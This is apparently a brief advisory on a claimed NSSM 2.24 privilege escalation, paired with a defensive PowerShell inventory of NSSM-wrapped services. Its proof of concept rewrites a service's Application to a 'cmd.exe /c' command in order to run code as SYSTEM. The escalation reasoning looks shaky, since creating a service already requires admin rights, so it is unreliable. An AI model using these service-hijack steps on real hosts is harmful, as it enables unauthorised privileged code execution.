
NSSM-2.24 Privilege Escalation

    nssm version

If the output says 2.24, the system is vulnerable.

Introduction: The Double-Edged Sword of Service Management

In the ecosystem of Windows system administration, few tools are as beloved yet as misunderstood as the Non-Sucking Service Manager (NSSM). For years, NSSM has been the go-to solution for developers and sysadmins needing to run executable files (batch scripts, Python apps, or Node.js servers) as Windows services. Its ability to automatically restart crashed processes and its intuitive GUI have made it a staple.

    # Copy the vulnerable binary to a writable location
    copy "%ProgramFiles%\NSSM\nssm-2.24.exe" .\nssm.exe
    .\nssm.exe install ElevationTest cmd.exe

    # Replace the application path with a privileged command
    .\nssm.exe set ElevationTest Application "cmd.exe /c echo SYSTEM LEVEL > C:\ProgramData\poc.txt"

    # Restart the service (requires the service to be stopped - if you can't, wait for reboot)
    net stop ElevationTest
    net start ElevationTest

    # Check the output - should be SYSTEM-owned file
    type C:\ProgramData\poc.txt
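To apply the version check across many hosts instead of running `nssm version` by hand, a read-only inventory can list every NSSM-wrapped service with the wrapper's version, the account it runs as, and the `Application` it launches. This is an added example, not code from the original page or from the NSSM project; the function names, the file-name match on "nssm", and the reliance on the binary's version resource and on the `Parameters` registry key are assumptions.

```powershell
# Added example, read-only: list services whose binary is an NSSM executable.
# Assumptions: the binary keeps "nssm" in its file name, its version resource
# reflects the release, and NSSM stores settings under Services\<name>\Parameters.
function Get-ServiceExecutable {
    param([string]$PathName)
    # Win32_Service.PathName may be quoted and may carry trailing arguments.
    if ($PathName -match '^\s*"?(.+?\.exe)\b') { return $Matches[1] }
    return $null
}

function Get-NssmServiceInventory {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ServiceExecutable -PathName $svc.PathName
        if (-not $exe -or (Split-Path -Path $exe -Leaf) -notmatch 'nssm') { continue }

        # Version taken from the file's version resource; null if missing.
        $version = $null
        if (Test-Path -LiteralPath $exe) {
            $version = (Get-Item -LiteralPath $exe).VersionInfo.ProductVersion
        }

        # What the wrapper actually launches for this service.
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)\Parameters"
        $params = Get-ItemProperty -LiteralPath $key -ErrorAction SilentlyContinue

        [pscustomobject]@{
            Service       = $svc.Name
            State         = $svc.State
            RunsAs        = $svc.StartName
            NssmBinary    = $exe
            NssmVersion   = $version
            Is224         = [bool]($version -match '^2\.24')
            Application   = $params.Application
            AppParameters = $params.AppParameters
        }
    }
}

Get-NssmServiceInventory | Sort-Object Is224 -Descending | Format-Table -AutoSize -Wrap
```

A renamed wrapper binary will not match the file-name filter, so confirm doubtful hosts with `nssm version` directly. Rows where `Application` differs from what was deployed, such as the `cmd.exe /c` string used in the test above, are the ones to review first.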